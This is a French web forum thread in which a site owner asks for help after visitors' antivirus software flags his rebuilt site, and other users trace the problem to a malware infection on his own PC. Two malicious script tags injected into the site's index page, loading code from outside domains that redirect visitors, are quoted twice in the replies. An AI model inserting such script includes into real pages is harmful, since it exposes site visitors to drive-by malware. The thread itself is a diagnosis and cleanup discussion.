Bonsoir, je pense qu'actuellement mon site web est infecté par un virus .
Tout a commencer avec une erreur mysql "session" sur le header de mon site . Certains utilisateurs m'ont reporté que leurs antivirus détectaient le site comme frauduleux . Le site était sur joomla .

J'ai donc arrêter le site, et ai fait développer une nouvelle version de mon site par un codeur .

Le site a été entièrement refait, en partant de zero , sur webspell .
J'ai sauvegarder l'intégralité du ftp + ma base mysql sur mon pc, que j'ai ensuite supprimé sur le serveur ( sauf le répertoire /logs , impossible à supprimer ).

A partir de la, de mon point de vue, il ne pouvait plus avoir de virus sur mon site, vue que tout était supprimé sur le ftp et la base de donné , j'ai donc mis en ligne ma nouvelle version du site . La , de nouveau retour comme quoi le site est infecté par un virus . Les images parleront d'elles même .

Et la, plusieurs problèmes de sécurité :






Ses messages d'alerte apparaissent a l'arrivé sur le site .
Quelqu'un a t'il une idée de la procédure a employer ?

L'adresse du site concerné : www.enaxion.net

En accédant au site, j'ai remarqué en bas à gauche que le site ce connectait sur les adresses suivantes :
http://www.computerscienceandmedia.com/
http://www.diehlsorchard.com/

Assez suspect :/

Merci d'avance

Bonjour,

Il y a ce code, au début du code source de ton site :

<script type="text/javascript" src="http://computerscienceandmedia.com/search.php"></script><script type="text/javascript" src="http://diehlsorchard.com/search.php"></script>

En plus du fait qu'un script n'a rien à faire ici, ce script contient des données "blobisées", ce qui est suspect.
Essayes de l'enlever.

Lorsque j'essaye d'accéder à ton site, que ce soit depuis Chromium ou FireFox (les deux sous GNU/Linux), je me fais rediriger vers la page d'accueil de Google, par la page "http://exzebit.jesusnthem.com/news/1997", qui est apparemment appelée par le script suspect.

ProgVal

Tu peux aussi désactiver le javascript sur ton navigateur.

x1301: Il semblerait que tu n'as pas compris le problème. Il a un problème sur SON site pour TOUS les visiteurs (ou presque).

Je sais, c'est un truc pour isoler le problème.

Magnifique infection... Win32/Ramnit en gros c'est vraiment pas mais alors vraiment pas cool.
Cependant, j'ai un doute.
En effet, j'ai fait analyser ton site www.enaxion.net sur Virus Total et pour lui il n'y a rien d'infecté. http://www.virustotal.com/url-scan/rep [...] 9f-1301131222

Je pense peut être à un faux positif.

Regarde ce tuto ; ( Merci à Mister_Mask, très pro )


http://sd-2.archive-host.com/membres/u [...] de_Ramnit.pdf

Page 7 ça devient intéressant...pour toi mais lis tout !

De plus, quelle version de java as-tu ? En effet, les exploitations de failles passe par les outils les plus utilisé donc ;

• Java
• Adobe reader
• Adobe flash player
• Open office
• Navigateur à tenir à jour

Citation : ProgVal

Bonjour,

Il y a ce code, au début du code source de ton site :

<script type="text/javascript" src="http://computerscienceandmedia.com/search.php"></script><script type="text/javascript" src="http://diehlsorchard.com/search.php"></script>

En plus du fait qu'un script n'a rien à faire ici, ce script contient des données "blobisées", ce qui est suspect.
Essayes de l'enlever.

Lorsque j'essaye d'accéder à ton site, que ce soit depuis Chromium ou FireFox (les deux sous GNU/Linux), je me fais rediriger vers la page d'accueil de Google, par la page "http://exzebit.jesusnthem.com/news/1997", qui est apparemment appelée par le script suspect.

ProgVal

Hum, ma machine doit donc être infecté . Le fichier source index.php est clean, hors celui sur le ftp contient la balise cité .
Le virus aurait modifié le fichier lors de son transfert vers le ftp ? J'ai fait d'ailleurs plusieurs testes, j'ai supprimé la balise, remit le fichier sur le ftp, il charge toujours les 2 pages, et quand je le re-importe sur mon pc, la balise n'est plus la .

Pour quintinou , j'ai look le index.php, j'ai rien trouvé de suspect également (a part la première balise ), comparé au lignes qu'ajoute soit disant ramnit sur ton exemple pdf .

Jvais me renseigner sur les procédures pour me débarrasser de ce virus .

Edit :
Filezilla 3.3.3.0 ( pas a jour )
Firefox 1.9.2.4095( pas a jour )
Adobe Reader 8.0 ( pas a jour )
Open office, Java et flash player je n'en sais rien .

Par contre, je ferai vérifier ton ordi parce que si c'est bien ce je crois...

Je viens d'apprendre que mon site distribue le virus suivant au utilisateurs :

Vista Antispyware 2010

Que faire? :/

Ba c'est un rogue, ce qui me parait bizarre c'est que j'ai fait analyser tout tes sites sur Virus Total mais il n'y a rien d'infecté. C'est bizarre surtout que Avira et Avast signale Win32/Ramnit comme tu as pu le voir.

As-tu bien suivi le pdf que je t'ai envoyé ? Le problème c'est que ton ordinateur est surement infecté.

Citation : pdf

Il faudra donc, a la moindre alerte, stopper toutes activités sur la machine et
diagnostiquer l'éventuelle infection grâce a un liveCD Antivirus,

La "solution" dans le pdf est.. flou.

ça me donne pas trop d'information sur quel programme télécharger, et quelles manœuvres effectuer .

Mon anti virus actuel ne détecte rien .

Je te conseille d'aller faire un petit tour ici et d'expliquer ton problème ; http://www.commentcamarche.net/forum/virus-securite-7


Pour le logiciel il s'appelle Dr Web live CD et détecte très bien cette infection mais ne l'utilise pas avant d'avoir expliquer ton problème sur le site que je viens te donner.